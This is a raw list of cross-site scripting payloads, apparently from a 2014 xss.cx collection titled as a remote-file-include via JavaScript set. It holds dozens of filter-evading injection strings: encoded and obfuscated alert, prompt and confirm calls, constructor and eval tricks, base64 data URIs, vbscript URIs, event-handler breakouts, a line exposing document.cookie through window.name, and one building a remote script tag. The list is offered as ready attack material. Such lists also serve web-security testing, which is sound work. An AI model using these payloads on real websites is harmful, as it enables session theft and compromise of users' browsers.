/* Remote File Include with Javascript via XSS.Cx */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-http-header-injection-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-xss-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-css-injection-signatures-only-fools-dont-use.txt */
/* Updated September 28, 2014 */
/* RFI START */
'() {'
document.createElement('img').src='javascript:while(1){}'
'<'s'v'g' o'n'l'o'a'd'='a'l'e'r't'('7')' '>'
(function(a){alert(1)}).call()
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}
p'rompt(1)
"(prompt(1))in"
parseInt("prompt",36);
eval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41)))
eval(1558153217..toString(36))(1)
eval(630038579..toString(30))(1)
eval(0x258da033.toString(30))(1)
for((i)in(self))eval(i)(1)
{"source":{},"__proto__":{"source":"$`onerror=prompt(1)>"}}
//prompt.ml%2f@ᄒ.ws/✌
//prompt.ml%2f@⒕₨
javascript:prompt(1)#{"action":1}
vbscript:prompt(1)#{"action":1}
window.location.assign("http://xss.cx")
window.name='a\x01b'
window.name='hacked';location.replace('about:blank');
window.name="javascript:confirm((window.opener||window).document.cookie);";
window.open("http://xss.cx","confirm(document.domain);", "", false);
vbscr	ipt:confirm(1)"
vbscript:confirm(1);
vbscript:confirm(1);
{{{}.toString.constructor('confirm(1)')()}}
try{confirm(document.domain)}catch(e){location.reload()}
\u003C
\u003E
\u003c
\u003cscript\u003econfirm(\u0027XSS\u0027)\u003c/script\u003e
\u003e
\u0061lert(1)
\u0061\u006c\u0065\u0072\u0074
\u0061\u006c\u0065\u0072\u0074(1)
%ufflcxss%2f%uffle
this["ownerDocu"+"ment"]["loca"+"tion"]=”//google.com”
throw delete~typeof~confirm(1)/
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
data:text/html,
.__defineGetter__.constructor('[].constructor.
defineSetter('x',confirm); x=1;
delete [a=confirm],delete a(1)
delete confirm(1)
delete~[a=confirm]/delete a(1)
var a=0; ((a == 1) ? 2 : confirm(1));//
null%22%20style%3d%22background%3aexpression%28confirm%282727%29
";document.body.addEventListener("DOMActivate",confirm(1))//
delete~[a=confirm]/delete a(1)
(0)['constructor']['constructor']("\141\154\145\162\164(1)")();
javascript:confirm&lpar1&rpar
" onfocus="write(unescape('<')+'script src='+unescape('"http://')
' onmouseover=confirm(document.location)
(0)['constructor']['constructor']("\141\154\145\162\164(1)")();
{1+1,confirm(8)}